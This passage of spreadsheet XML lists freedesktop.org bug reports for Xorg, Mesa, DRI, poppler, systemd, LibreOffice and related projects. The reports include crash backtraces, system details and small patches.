-- Machine or mobo model: Asus P5Q-EM
-- Display connector: DVI
-- KMS: enabled
-- xf86-video-intel: efbcf29dd1a1ca058b7a2a93f0685102c06c9369
-- xserver: 1.6.3.901
-- mesa: ecf3091cc78638919f1977ccc0307c51b6731385
-- drm: 67e4172394a88d4922fb8d9c7c3d96ce7e02c5a6
-- kernel: 2.6.31</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-37237</t>
  </si>
  <si>
    <t>Add a us variant of German layouts (patch included)</t>
  </si>
  <si>
    <t>Created attachment 46748
Patch for adding the keyboard layout variant
Many German users prefer the US keyboard layout for a better linux and programming experience but they usually still want to be able to use German umlauts and ÃŸ as well as the Euro sign. I therefore propose to add a keyboard variant putting those special chars on the AltGr-combination of the keys where the Umlauts are present on the German layout.
The patch for this proposal is appended or available as a git clone at:
https://github.com/sdoerner/xkeyboard-config
I tried to follow the guidelines at http://www.freedesktop.org/wiki/Software/XKeyboardConfig/Rules
Please let me know if any changes are necessary to get it accepted.
Thank you.</t>
  </si>
  <si>
    <t>POLICYKIT-63575</t>
  </si>
  <si>
    <t>[Patch] Fix handling of non-string values coming from rules code</t>
  </si>
  <si>
    <t>DRI-109378</t>
  </si>
  <si>
    <t>[CI][SHARDS] igt@i915_missed_irq - skip - Test requirement: expect_rings Last errno: 19 No such device SKIP</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/IGT_4776/shard-iclb6/igt@i915_missed_irq.html
IGT-Version: 1.23-ga76fa4d0 (x86_64) (Linux: 5.0.0-rc2-CI-CI_DRM_5434+ x86_64)
Test requirement not met in function __real_main96 file ../tests/i915/missed_irq.c:116:
Test requirement: expect_rings
Last errno: 19 No such device
SKIP (0.005s)</t>
  </si>
  <si>
    <t>DRI-106883</t>
  </si>
  <si>
    <t>[CI] igt@kms_cursor_legacy@basic-* - fail - Failed assertion: poll(&amp;pfd 1 0) == 0</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_4278_39/fi-glk-j4005/igt@kms_cursor_legacy@basic-busy-flip-before-cursor-atomic.html
(kms_cursor_legacy:3499) CRITICAL: Test assertion failure function basic_flip_cursor file ../tests/kms_cursor_legacy.c:579:
(kms_cursor_legacy:3499) CRITICAL: Failed assertion: poll(&amp;pfd 1 0) == 0
Subtest basic-busy-flip-before-cursor-atomic failed.</t>
  </si>
  <si>
    <t>XORG-385</t>
  </si>
  <si>
    <t>glGetString(GL_VERSION) corrupts malloc heap</t>
  </si>
  <si>
    <t>The following code snippet reformats the version string appending 
(GLLibraryVersion) via a sprintf format that adds  (%s). The code originally
added 3 to the length to account for the space open paren and close paren. But
it forgot to add 1 more character to account for the terminating null character
that sprintf adds at the end of the string. This meant that the __glXSprintf was
writing 1 character beyond the malloc block and was corrupting the malloc heap.
The fix is to add 4 to the malloc size rather than 3 patch will be attached.
    else if ( name == GL_VERSION ) {
	if ( atof( string ) &gt; atof( GLServerVersion ) ) {
	    buf = __glXMalloc( __glXStrlen( string ) 
			       + __glXStrlen( GLServerVersion )
			       + 3 )
	    if ( buf == NULL ) {
		string = GLServerVersion
	    }
	    else {
		__glXSprintf( buf %s (%s) GLServerVersion string )
		string = buf
	    }
	}
    }</t>
  </si>
  <si>
    <t>MESA-107601</t>
  </si>
  <si>
    <t>Rise of the Tomb Raider Segmentation Fault when the game starts</t>
  </si>
  <si>
    <t>The game crashes when starting the benchmark or continue the game from the main menu. A dialog pops up with a Segmentation Fault (signal 11) message and a crash dump is created. Using latest Oibaf ppa Mesa git. The game did work four days ago but not after Mesa update.
This Vulkan demo works fine:
http://nonfatmatt.blogspot.com/2018/07/new-demo-for-testing-unreal-engine-4-in.html
My System:
  Host: ryzenpc Kernel: 4.18.0-rc1+ x86_64 bits: 64 Desktop: Xfce 4.12.4 
  Distro: Debian GNU/Linux buster/sid 
Machine:
  Type: Desktop Mobo: ASUSTeK model: PRIME B350M-K v: Rev X.0x 
  serial:  UEFI: American Megatrends v: 4011 date: 04/19/2018 
CPU:
  6-Core: AMD Ryzen 5 1600 type: MT MCP speed: 2727 MHz 
Graphics:
  Card-1: AMD Baffin [Polaris11] driver: amdgpu v: kernel 
  Display: x11 server: X.Org 1.20.0 driver: amdgpuati 
  unloaded: fbdevmodesettingvesa resolution: 1920x1080~60Hz 
  OpenGL: renderer: Radeon RX 560 Series (POLARIS11 DRM 3.27.0 4.18.0-rc1+ 
  LLVM 6.0.1) 
  v: 4.5 Mesa 18.3.0-devel</t>
  </si>
  <si>
    <t>fin4478</t>
  </si>
  <si>
    <t>XORG-92894</t>
  </si>
  <si>
    <t>xorg-wrapper.c and WITH_LIBDRM dead code</t>
  </si>
  <si>
    <t xml:space="preserve">xorg-wrapper.c contains few #ifdef WITH_LIBDRM sections that are never activated even if WITH_LIBDRM is defined in xorg-config.h
That's because xorg-wrapper.c doesn't include xorg-config.h (directly or indirectly).
Fix:
--- xorg-server-1.18.0/hw/xfree86/xorg-wrapper.c~       2015-11-10 19:37:11.000000000 +0100
+++ xorg-server-1.18.0/hw/xfree86/xorg-wrapper.c        2015-11-10 19:37:18.640853466 +0100
@@ -246 +247 @@
  */
 #include dix-config.h
+#include xorg-config.h
 #include 
 #include </t>
  </si>
  <si>
    <t>XORG-98384</t>
  </si>
  <si>
    <t>X.org core dump when modprobing nouveau on a dual GPU laptop</t>
  </si>
  <si>
    <t>Created attachment 127468
journalctl excerpt of a full session coredump
Hi there
Iâ€™ve recently got a new laptop with a Intel Core i7-6700HQ CPU and its HD Graphics 530 integrated GPU + a Nvidia Quadro M1000M dedicated GPU. Iâ€™m running an up-to-date Arch Linux system.
Iâ€™m encountering several issues among which there is the following one. Note that Iâ€™m not really sure against what I should report this bug so just ended up putting it hereâ€¦
My system is currently configured to not load nouveau on boot. So only i915 is loaded.
After starting (which bring me to my DM sddm) and either log into my session and opening a terminal or switch to a tty and log into that one modprobing nouveau (to test DRI_PRIME for instance) result in a xorg core dump.
A journalctl excerpt:
[  492.475762] systemd-coredump[1012]: Process 940 (Xorg) of user 0 dumped core.
                                       Stack trace of thread 940:
                                       #0  0x00007f243640e04f raise (libc.so.6)
                                       #1  0x00007f243640f47a abort (libc.so.6)
                                       #2  0x00007f2436406ea7 __assert_fail_base (libc.so.6)
                                       #3  0x00007f2436406f52 __assert_fail (libc.so.6)
                                       #4  0x0000000000454d1e dixRegisterPrivateKey (Xorg)
                                       #5  0x00007f242a9f3781 glamor_init (libglamoregl.so)
                                       #6  0x00007f242ac278a0 n/a (modesetting_drv.so)
                                       #7  0x0000000000436c7a AddGPUScreen (Xorg)
                                       #8  0x0000000000496d1d n/a (Xorg)
                                       #9  0x000000000049c80b n/a (Xorg)
                                       #10 0x0000000000497097 n/a (Xorg)
                                       #11 0x000000000047942b xf86VTEnter (Xorg)
                                       #12 0x000000000043b2dd WakeupHandler (Xorg)
                                       #13 0x00000000005954f9 WaitForSomething (Xorg)
                                       #14 0x000000000043656e n/a (Xorg)
                                       #15 0x000000000043a763 n/a (Xorg)
                                       #16 0x00007f24363fb291 __libc_start_main (libc.so.6)
                                       #17 0x00000000004246e9 _start (Xorg)
                                       Stack trace of thread 943:
                                       #0  0x00007f24361cb10f pthread_cond_wait@@GLIBC_2.3.2 (libpthread.so.0)
                                       #1  0x00007f2431a5fef9 n/a (intel_drv.so)
                                       #2  0x00007f24361c5454 start_thread (libpthread.so.0)
                                       #3  0x00007f24364c37df __clone (libc.so.6)
                                       Stack trace of thread 941:
                                       #0  0x00007f24361cb10f pthread_cond_wait@@GLIBC_2.3.2 (libpthread.so.0)
                                       #1  0x00007f2431a5fef9 n/a (intel_drv.so)
                                       #2  0x00007f24361c5454 start_thread (libpthread.so.0)
                                       #3  0x00007f24364c37df __clone (libc.so.6)
                                       Stack trace of thread 942:
                                       #0  0x00007f24361cb10f pthread_cond_wait@@GLIBC_2.3.2 (libpthread.so.0)
                                       #1  0x00007f2431a5fef9 n/a (intel_drv.so)
                                       #2  0x00007f24361c5454 start_thread (libpthread.so.0)
                                       #3  0x00007f24364c37df __clone (libc.so.6)
You can find a more longer excerpt in attachment from a case where I crashed the system from within a plasma session (youâ€™ll see all major plasma components core dump as well). Note that in this case Iâ€™m unable to recover my system without rebooting (nothing works excepted power button) while when crashing from a TTY the X.org server is restarted on DISPLAY:0.
My previous system with Intel Core i7-4702HQ and Nvidia GT750M isnâ€™t affected.</t>
  </si>
  <si>
    <t>bruno.n.pagani</t>
  </si>
  <si>
    <t>LIBREOFFICE-69025</t>
  </si>
  <si>
    <t>Other: Letter Wizard: missing combobox for country in printed items</t>
  </si>
  <si>
    <t>Created attachment 85320
screenshot of the dialog since 4.0 (top) and in 3.6 (bottom)
Problem description: 
Steps to reproduce:
1. Choose File - Wizards - Letter.
2. Go to step 3. Printed items.
Current behavior:
You see text Use a typical letter format for this country: and no combobox for country selection.
Expected behavior:
Combobox should be displayed.
Operating System: All
Version: 4.0.0.3 release
Last worked in: 3.6.7.2 rc</t>
  </si>
  <si>
    <t>DRI-35466</t>
  </si>
  <si>
    <t>Screen corruption with 2.6.38 and i855</t>
  </si>
  <si>
    <t>With 2.6.38 my screen shows many corruptions as i already described here:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=619022
Here you can find also an attachment that shows the problem.
Some information not reported in Debian bug report:
xserver-xorg 1:7.6+4
xserver-xorg-core 2:1.9.4-90
xserver-xorg-video-intel 2:2.14.0-4
libdrm-intel1 2.4.23-3
Let me know if you need more info.
Cesare.</t>
  </si>
  <si>
    <t>celeonar</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-94423</t>
  </si>
  <si>
    <t>Improved identification of JPEG 2000 format family</t>
  </si>
  <si>
    <t>The current database entry for JPEG 2000 doesn't distinguish between the different sub-formats of the JPEG 2000 standard. I would suggest to replace it by the more specific entry that is given in the link below:
https://issues.apache.org/jira/browse/TIKA-970
A set of test files that covers all the sub-formats can be found here (I'm the author of this dataset I originally prepared it to support a patch for Unix File):
https://github.com/bitsgalore/jp2kMagic
I don't know if using Tika definitions might introduce any license issues. In any case the author of the Tika definitions adapted them from my own earlier Unix File magic.</t>
  </si>
  <si>
    <t>johan.vanderknijff</t>
  </si>
  <si>
    <t>POPPLER-15629</t>
  </si>
  <si>
    <t>JPX images in PDFs are not displayed</t>
  </si>
  <si>
    <t>This report has been filed here:
https://bugs.edge.launchpad.net/ubuntu/+source/poppler/+bug/219361
Download a PDF from Google Book Search (say from http://books.google.com/books?id=jpceAAAAMAAJ ). Open it with evince. Something like the following will be output on the console:
Error (88087): 12697 extraneous bytes after segment
Error (97507): Error in JPX stream
Error (88087): 12697 extraneous bytes after segment
Error (97507): Error in JPX stream
Error (86590): 12697 extraneous bytes after segment
Error (86590): 12697 extraneous bytes after segment
Error (87420): 12697 extraneous bytes after segment
Error (87420): 12697 extraneous bytes after segment
Error (98085): 12697 extraneous bytes after segment
Error (98085): 12697 extraneous bytes after segment
Error (99312): 12697 extraneous bytes after segment
Error (106918): Error in JPX stream
Error (99312): 12697 extraneous bytes after segment
Error (106918): Error in JPX stream
GhostScript and Acroread both display the embedded images properly.
poppler version: 0.6.4-1
PDF: http://launchpadlibrarian.net/13579707/N9Y4AAAAMAAJ.pdf
Thanks</t>
  </si>
  <si>
    <t>MESA-19099</t>
  </si>
  <si>
    <t>Back face culling culls front face when rendering to fbo</t>
  </si>
  <si>
    <t>This can be reproduced using the fbotexture test:
1. start fbotexture
2. hit 'c'
3. see the teapot inside rendered which is black
Using LIBGL_ALWAYS_SOFTWARE=1 the correct result is shown i.E. back face gets culled. Further using glCullFace(GL_FRONT) in fbotexture swaps the results.</t>
  </si>
  <si>
    <t>pierre</t>
  </si>
  <si>
    <t>PIXMAN-56889</t>
  </si>
  <si>
    <t>pixman-ppc.c:40: error: 'have_vmx' undeclared (first use in this function)</t>
  </si>
  <si>
    <t>Building pixman 0.28.0 fails on PowerPC Mac OS X with this error:
pixman-ppc.c:40: error: 'have_vmx' undeclared (first use in this function)
This was reported to the MacPorts project here:
https://trac.macports.org/ticket/36923
There you may see a full build log if desired.
Here is the patch we are using to fix this:
https://trac.macports.org/attachment/ticket/36923/pixman_pixman-ppc.c.patch
This fixes the #ifdef __APPLE__ case but we believe the #elif defined (__OpenBSD__) case has a similar problem (trying to check sizeof(have_vmx) before having declared that variable).
P.S: Version 0.28.x is missing from the Version menu in this issue tracker.</t>
  </si>
  <si>
    <t>MESA-93648</t>
  </si>
  <si>
    <t>Random lines being rendered when playing Dolphin (geometry shaders related w/ apitrace)</t>
  </si>
  <si>
    <t>We recently setup Dolphin's automated rendering tests on Fiji XT with Mesa/amdgpu. It started detected a random rendering issue which I think we can attribute to a driver bug.
See https://fifoci.dolphin-emu.org/compare/1086020-1085934/ . Left side has the bad rendering right side the good rendering.
The issue is properly captured in this apitrace: http://delroth.net/radeon-unpredictable.trace -- rendering it on my Fiji XT system shows the lines but rendering it on i965 doesn't.
We have also had reports of users seeing this in action on Pitcairn GPUs: https://bugs.dolphin-emu.org/issues/9239</t>
  </si>
  <si>
    <t>delroth</t>
  </si>
  <si>
    <t>TELEPATHY-19327</t>
  </si>
  <si>
    <t>gabble crashes when trying to make a call</t>
  </si>
  <si>
    <t>Can reproduce with 0.7.17 or with HEAD as of today (dec 29 2008) aka commit db01f9c9c3f16adb4c9ab85e051cbc424862d2d0
I believe this is the relevant part of the log:
(telepathy-gabble:12381): tp-glib-DEBUG: channel_request_new: New channel request at 0x82a9438: ctype=org.freedesktop.Telepathy.Channel.Type.StreamedMedia htype=0 handle=0 suppress=1
tp_properties_mixin_emit_changed: emitting properties changed for property:
  nat-traversal
tp_properties_mixin_emit_flags: emitting properties flags changed for property:
  nat-traversal's flags now: [READ]
tp_group_mixin_change_members: emitting members changed
  message       : 
  added         : [1 (tester.colltest3@gmail.com)]
  removed       : []
  local_pending : []
  remote_pending: []
  actor         : 0
  reason        : 0: unspecified reason
tp_group_mixin_change_flags: emitting group flags changed
  added    : [CAN_ADD]
  removed  : []
  flags now: [CAN_ADD]
tp_properties_mixin_emit_changed: emitting properties changed for property:
  stun-server
tp_properties_mixin_emit_flags: emitting properties flags changed for property:
  stun-server's flags now: [READ]
tp_properties_mixin_emit_changed: emitting properties changed for property:
  stun-port
tp_properties_mixin_emit_flags: emitting properties flags changed for property:
  stun-port's flags now: [READ]
tp_properties_mixin_emit_changed: emitting properties changed for property:
  gtalk-p2p-relay-token
tp_properties_mixin_emit_flags: emitting properties flags changed for property:
  gtalk-p2p-relay-token's flags now: [READ]
** (telepathy-gabble:12381): DEBUG: new_media_channel: object path /org/freedesktop/Telepathy/Connection/gabble/jabber/tester_2ecolltest3_40gmail_2ecom_2fTelepathy/MediaChannel0
(telepathy-gabble:12381): tp-glib-DEBUG: satisfy_request: completing queued request 0x82a9438 with success channel_type=org.freedesktop.Telepathy.Channel.Type.StreamedMedia handle_type=0 handle=0 suppress_handler=1
(telepathy-gabble:12381): tp-glib-DEBUG: channel_request_free: Freeing channel request at 0x82a9438: ctype=org.freedesktop.Telepathy.Channel.Type.StreamedMedia htype=0 handle=0 suppress=1
** (telepathy-gabble:12381): DEBUG: _caps_disco_cb: setting caps for 2 (thanks to 2 tester.colltest5@gmail.com/Telepathy5FBA976F) to 2085 (save_caps 26)
** (telepathy-gabble:12381): DEBUG: gabble_presence_set_capabilities: about to add caps 2085 to resource Telepathy5FBA976F with serial 1
** (telepathy-gabble:12381): DEBUG: gabble_presence_set_capabilities: found resource Telepathy5FBA976F
** (telepathy-gabble:12381): DEBUG: gabble_presence_set_capabilities: adding caps 2085 to resource Telepathy5FBA976F
** (telepathy-gabble:12381): DEBUG: gabble_presence_set_capabilities: resource Telepathy5FBA976F caps now 2111
** (telepathy-gabble:12381): DEBUG: gabble_presence_set_capabilities: total caps now 2111
** (telepathy-gabble:12381): DEBUG: _caps_disco_cb: caps for 2 (thanks to 2 tester.colltest5@gmail.com/Telepathy5FBA976F) now 2111
** (telepathy-gabble:12381): DEBUG: disco_waiter_free: freeing waiter 0x8422ba0 for handle 2 with serial 1
tp_group_mixin_change_members: emitting members changed
  message       : 
  added         : []
  removed       : []
  local_pending : []
  remote_pending: [2 (tester.colltest5@gmail.com)]
  actor         : 0
  reason        : 0: unspecified reason
tp_group_mixin_change_flags: emitting group flags changed
  added    : [CAN_REMOVE|CAN_RESCIND]
  removed  : [CAN_ADD]
  flags now: [CAN_REMOVE|CAN_RESCIND]
** (telepathy-gabble:12381): DEBUG: create_session: 0x8428ed8: Creating new outgoing session
** (telepathy-gabble:12381): DEBUG: create_session: new session 1591039327 @ 0x82aaca0 created
** (telepathy-gabble:12381): DEBUG: _latch_to_session: 0x8428ed8: Latching onto session 0x82aaca0
** (telepathy-gabble:12381): DEBUG: _gabble_media_channel_request_streams: called
** (telepathy-gabble:12381): DEBUG: _gabble_media_channel_request_streams: picking the best resource (want audio: 1 want video: 1
** (telepathy-gabble:12381): DEBUG: _gabble_media_channel_request_streams: Picking resource 'Telepathy5FBA976F' (transport: http://www.google.com/transport/p2p dialect: 3)
** (telepathy-gabble:12381): DEBUG: _gabble_media_channel_request_streams: Creating new jingle content with ns http://jabber.org/protocol/jingle/description/audio : http://www.google.com/transport/p2p
** (telepathy-gabble:12381): DEBUG: create_content: session creating new content type conn == 0x82b01e8 jf == 0x82b4240
GLib-GObject-CRITICAL **: g_value_get_object: assertion `G_VALUE_HOLDS_OBJECT (value)' failed
aborting...
Program received signal SIGTRAP Trace/breakpoint trap.
IA__g_logv (log_domain= log_level=G_LOG_LEVEL_CRITICAL format=0xb7c267ea %s: assertion `%s' failed 
    args1=0xbfb65aec ï¿½|É·\034qÉ·) at gmessages.c:502
502		  depth--
(gdb) 
(gdb) 
(gdb) 
(gdb) bt
#0  IA__g_logv (log_domain= log_level=G_LOG_LEVEL_CRITICAL format=0xb7c267ea %s: assertion `%s' failed 
    args1=0xbfb65aec ï¿½|É·\034qÉ·) at gmessages.c:502
#1  0xb7bd7d04 in IA__g_log (log_domain=0xb7c9645c GLib-GObject log_level=G_LOG_LEVEL_CRITICAL format=0xb7c267ea %s: assertion `%s' failed)
    at gmessages.c:517
#2  0xb7bd7f30 in IA__g_return_if_fail_warning (log_domain=0xb7c9645c GLib-GObject pretty_function=0xb7c97c9e IA__g_value_get_object 
    expression=0xb7c9711c G_VALUE_HOLDS_OBJECT (value)) at gmessages.c:532
#3  0xb7c70f58 in IA__g_value_get_object (value=0xbfb65dc0) at gobject.c:2050
#4  0xb7c7c512 in IA__g_cclosure_marshal_VOID__OBJECT (closure=0x833e478 return_value=0x0 n_param_values=2 param_values=0xbfb65dac 
    invocation_hint=0xbfb65c8c marshal_data=0x80a8690) at gmarshal.c:636
#5  0xb7c6f654 in IA__g_closure_invoke (closure=0x833e478 return_value=0x0 n_param_values=2 param_values=0xbfb65dac invocation_hint=0xbfb65c8c)
    at gclosure.c:490
#6  0xb7c80820 in signal_emit_unlocked_R (node=0x8422348 detail=0 instance=0x82aaca0 emission_return=0x0 instance_and_params=0xbfb65dac)
    at gsignal.c:2440
#7  0xb7c81bda in IA__g_signal_emit_valist (instance=0x82aaca0 signal_id=56 detail=0 var_args=0xbfb65ff0 ) at gsignal.c:2199
#8  0xb7c81e82 in IA__g_signal_emit (instance=0x82aaca0 signal_id=56 detail=0) at gsignal.c:2243
#9  0x080609b0 in create_content (sess=0x82aaca0 content_type=137051904 type= 
    content_ns=0x80ba3d0 http://jabber.org/protocol/jingle/description/audio transport_ns=0x80bb530 http://www.google.com/transport/p2p 
    name=0x833fd98 stream1 content_node=0x0 error=0x0) at jingle-session.c:590
#10 0x08060ac6 in gabble_jingle_session_add_content (sess=0x82aaca0 mtype=JINGLE_MEDIA_TYPE_AUDIO 
    content_ns=0x80ba3d0 http://jabber.org/protocol/jingle/description/audio transport_ns=0x80bb530 http://www.google.com/transport/p2p)
    at jingle-session.c:1605
#11 0x080a94b6 in gabble_media_channel_request_streams (iface=0x8428ed8 contact_handle=2 types=0x82a9408 context=0x8333f30)
    at media-channel.c:1453
#12 0xb7d8c4a1 in tp_svc_channel_type_streamed_media_request_streams (self=0x8428ed8 in_Contact_Handle=2 in_Types=0x82a9408 context=0x8333f30)
    at _gen/tp-svc-channel.c:2814
#13 0xb7d878d6 in _tp_marshal_VOID__UINT_BOXED_POINTER (closure=0xbfb66400 return_value=0x0 n_param_values=4 param_values=0x8333e20 
    invocation_hint=0x0 marshal_data=0xb7d8c450) at _gen/signals-marshal.c:1193
#14 0xb7cf8646 in ?? () from /usr/lib/libdbus-glib-1.so.2
#15 0xbfb66400 in ?? ()
#16 0x00000000 in ?? ()
(gdb)</t>
  </si>
  <si>
    <t>XORG-20357</t>
  </si>
  <si>
    <t>vmware workstation 6.5.1 crashes caused by xkb changes</t>
  </si>
  <si>
    <t>Overview:
vmware workstation 6.5.1 crashes - sometimes right after starting sometimes it takes some playing around with it it usually happens within a minute or two.
Steps to reproduce:
start vmware workstation 6.5.1 (I only tried this with Windows XP client - don't know if that's a requirement to reproduce the bug)
after a short while you will get a hard crash
from the logfile:
Feb 27 09:00:13.169: mks| SymBacktrace[0] 00007f63ab127910 rip=0000000000417d2c in function (null) in object /usr/lib/vmware/bin/vmware-vmx loaded at 0000000000400000
Feb 27 09:00:13.169: mks| SymBacktrace[1] 00007f63ab127930 rip=00000000004defe0 in function (null) in object /usr/lib/vmware/bin/vmware-vmx loaded at 0000000000400000
Feb 27 09:00:13.169: mks| SymBacktrace[2] 00007f63ab127e10 rip=000000000046c598 in function (null) in object /usr/lib/vmware/bin/vmware-vmx loaded at 0000000000400000
Feb 27 09:00:13.169: mks| SymBacktrace[3] 00007f63ab127f00 rip=0000003b2f80f0f0 in function (null) in object /lib64/libpthread.so.0 loaded at 0000003b2f800000
Feb 27 09:00:13.169: mks| SymBacktrace[4] 00007f63ab128358 rip=0000003b2ec32f05 in function gsignal in object /lib64/libc.so.6 loaded at 0000003b2ec00000
Feb 27 09:00:13.169: mks| SymBacktrace[5] 00007f63ab128360 rip=0000003b2ec34a73 in function abort in object /lib64/libc.so.6 loaded at 0000003b2ec00000
Feb 27 09:00:13.169: mks| SymBacktrace[6] 00007f63ab128490 rip=0000003b2ec2bef9 in function __assert_fail in object /lib64/libc.so.6 loaded at 0000003b2ec00000
Feb 27 09:00:13.169: mks| SymBacktrace[7] 00007f63ab128500 rip=00007f63e57c1bc7 in function _XRead in object /opt/X11R7/lib/libX11.so.6 loaded at 00007f63e5776000
Feb 27 09:00:13.169: mks| SymBacktrace[8] 00007f63ab128520 rip=00007f63e57c1be9 in function _XReadPad in object /opt/X11R7/lib/libX11.so.6 loaded at 00007f63e5776000
Feb 27 09:00:13.169: mks| SymBacktrace[9] 00007f63ab128540 rip=00007f63e57a925d in function XGetModifierMapping in object /opt/X11R7/lib/libX11.so.6 loaded at 00007f63e5776000
I bisected the problem and got this result:
f062e90a95f9b7ae5458ef2100615e8ace9b66a7 is first bad commit
commit f062e90a95f9b7ae5458ef2100615e8ace9b66a7
Author: Daniel Stone 
Date:   Wed Apr 16 19:15:30 2008 +0300
    Input: Remove modifierKeyMap
    Since modifierKeyMap is generated from modifierMap just remove it and
    only generate it when we need to send the modifier map to the client.
    Signed-off-by: Daniel Stone 
    Signed-off-by: Peter Hutterer 
:040000 040000 06aab23c090ed15e2f0717a268fec2a513623d82 2915098bce639e58b10c864a9e8b2718ca45c9fd M	Xi
:040000 040000 f96cdcd2fc6a7f3b7fb7ecd06bd54d826f9ae951 2101a653015ba782fbedaa529bab0690953aad9b M	dix
:040000 040000 1323147dac52590fe241d46eb3ef0cf3edb97cd7 792af8c6331f77723a35ec341ce62666dabcd838 M	hw
:040000 040000 316f07c3545508dbfc507b4dbea8527b573ce996 1f6c496ffe24bb5740e4fd254fa62a521c6624ef M	include
:040000 040000 c48224593d0cac3a70fe6135c9857f6159831abf fc3f58eb80b3314a3ff0155b39c535df93eea555 M	xkb</t>
  </si>
  <si>
    <t>Dirk.Hohndel</t>
  </si>
  <si>
    <t>XORG-35557</t>
  </si>
  <si>
    <t>[945GM] Text display errors</t>
  </si>
  <si>
    <t>Forwarding this bug from Ubuntu reporter Jarrett Chisholm:
http://bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-intel/+bug/737967
[Problem]
Vertical pixel columns are missing from every 20-50th character in text in firefox and other applications.  See screenshot.
[Original Description]
Basically text in Ubuntu tends not to draw quite right.  Please see the attached screenshot (desktop1.png) for a visual.
I've noticed this happening in Ubuntu Thunderbird and Eclipse (the main 3 programs I use).
DistroRelease: Ubuntu 11.04
Package: xorg 1:7.6~3ubuntu11
ProcVersionSignature: Ubuntu 2.6.38-1.28-generic 2.6.38-rc2
Uname: Linux 2.6.38-1-generic i686
Architecture: i386
CompositorRunning: compiz
Date: Fri Mar 18 22:17:57 2011
DistUpgraded: Log time: 2011-02-04 18:07:51.411927
DistroCodename: natty
DistroVariant: ubuntu
GraphicsCard:
 Intel Corporation Mobile 945GM/GMS 943/940GML Express Integrated Graphics Controller [8086:27a2] (rev 03) (prog-if 00 [VGA controller])
   Subsystem: Dell Device [1028:01d4]
MachineType: Dell Inc. Latitude D520
SourcePackage: xorg
UpgradeStatus: Upgraded to natty on 2011-03-09 (9 days ago)
dmi.bios.date: 05/28/2007
dmi.bios.vendor: Dell Inc.
dmi.bios.version: A06
dmi.board.name: 0NF743
dmi.board.vendor: Dell Inc.
dmi.chassis.type: 8
dmi.chassis.vendor: Dell Inc.
dmi.modalias: dmi:bvnDellInc.:bvrA06:bd05/28/2007:svnDellInc.:pnLatitudeD520:pvr:rvnDellInc.:rn0NF743:rvr:cvnDellInc.:ct8:cvr:
dmi.product.name: Latitude D520
dmi.sys.vendor: Dell Inc.
version.compiz: compiz 1:0.9.4-0ubuntu5
version.libdrm2: libdrm2 2.4.23-1ubuntu3
version.libgl1-mesa-glx: libgl1-mesa-glx 7.10.1-0ubuntu2
version.xserver-xorg: xserver-xorg 1:7.6~3ubuntu11
version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:6.14.0-0ubuntu2
version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.14.0-4ubuntu2
version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:0.0.16+git20110107+b795ca6e-0ubuntu5</t>
  </si>
  <si>
    <t>PYCAIRO-45229</t>
  </si>
  <si>
    <t>py2cairo ImageSurface.create_for_data uses deprecated buffer API.</t>
  </si>
  <si>
    <t>image_surface_create_for_data uses 'array's and PyObject_AsWriteBuffer which are considered outdated in: http://docs.python.org/c-api/objbuffer.html
The new buffer api is available from 2.6 onwards. Switching to it may even fix #44935.</t>
  </si>
  <si>
    <t>dkreuter</t>
  </si>
  <si>
    <t>XCB-14202</t>
  </si>
  <si>
    <t>XDM- AUTHORIZATION-1 is broken</t>
  </si>
  <si>
    <t>Created attachment 13861
use getsockname
It seems that the function _xcb_get_auth_info in xcb_auth.c is passing 
the peer host name instead of its own host name to compute_auth.
This of course causes it to fail even on valid cookies.</t>
  </si>
  <si>
    <t>elylevy</t>
  </si>
  <si>
    <t>GEOCLUE-15054</t>
  </si>
  <si>
    <t>license not included in all files</t>
  </si>
  <si>
    <t>Most files do not currently have the LGPL preamble it should be added
(COPYING does state the license correctly).</t>
  </si>
  <si>
    <t>kroykroy</t>
  </si>
  <si>
    <t>LIBREOFFICE-60977</t>
  </si>
  <si>
    <t>Recalculation on load: Usage of cached values conflicting with XVolatliteResults of UNO plugins</t>
  </si>
  <si>
    <t>LibreOffice 4.0.0.3 offers a setting at Preferences-&gt;LibreOffice Calc-&gt;Formula called Recalculation on file load.
If this option is enabled (which it is by default) cached values (saved into the file) are used. This does not apply for functional like NOW() - of course.
However UNO plugin functions which return XVolatileResults are not called either hence it is not possible to initialize XVolatilieResults.
This will likely render all plugins with XVolatilieResults-Functions unusable since it effect a core property of XVolatileResults (the ability to force recalculation of a cell).
The problem does not occur if the above option is set to Always recalculate.
See also bug 60964 60973 60974.</t>
  </si>
  <si>
    <t>MESA-93356</t>
  </si>
  <si>
    <t>Intermittent piglit failure: piglit.spec.arb_compute_shader.execution.simple-barrier</t>
  </si>
  <si>
    <t>This test fails intermittently and is likely associated with d04612b60d98ff785646affaffc3d7243deecb74 when compute shaders were enabled.
It was first reproduced on IVBGT2 and also seen on HSWGT2 and HSWGT1.
piglit.spec.arb_shader_image_load_store.qualifiers also fails intermittently first appearing on bdwgt2.
I'll disable the tests in the CI and track resolution with this bug.</t>
  </si>
  <si>
    <t>DRI-70934</t>
  </si>
  <si>
    <t>[Regression] Problem with colors (depth?) on DCE5 Barts (HD69xx)</t>
  </si>
  <si>
    <t>I've switched from openSUSE's 3.4.47 to drm-next-3.13-wip and noticed problems with colors. Gradients are not smooth it looks like the GPU is working in some limited color depth (lower than 24b).</t>
  </si>
  <si>
    <t>SYSTEMD-82778</t>
  </si>
  <si>
    <t>emergency mode conflicts with rescue mode</t>
  </si>
  <si>
    <t>Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=757072
If you have a problem in your configuration (like a broken fstab entry) which triggers emergency.service and you try to boot the rescue mode via the kernel command line you get two conflicting rescue shells:
 Welcome to rescue mode! Type systemctl default or ^D to enter default mode.
  Welcome to emergency mode! After logging in type journalctl -xd to view
  Type journalctl -xb to view system logs. Type systemctl reboot to reboot.
  system logs systemctl reboot to reboot systemctl default to try again
  to boot into default mode.
  Give root password for maintenance
  Give root password for maintenance
  (or type Control-D to continue): (or type Control-D o continue):
Both rescue and emergency mode seem to fight over stdin and one is constantly kicked out of the rescue shell.</t>
  </si>
  <si>
    <t>LIBXKLAVIER-20244</t>
  </si>
  <si>
    <t>Bad -I ordering can break build</t>
  </si>
  <si>
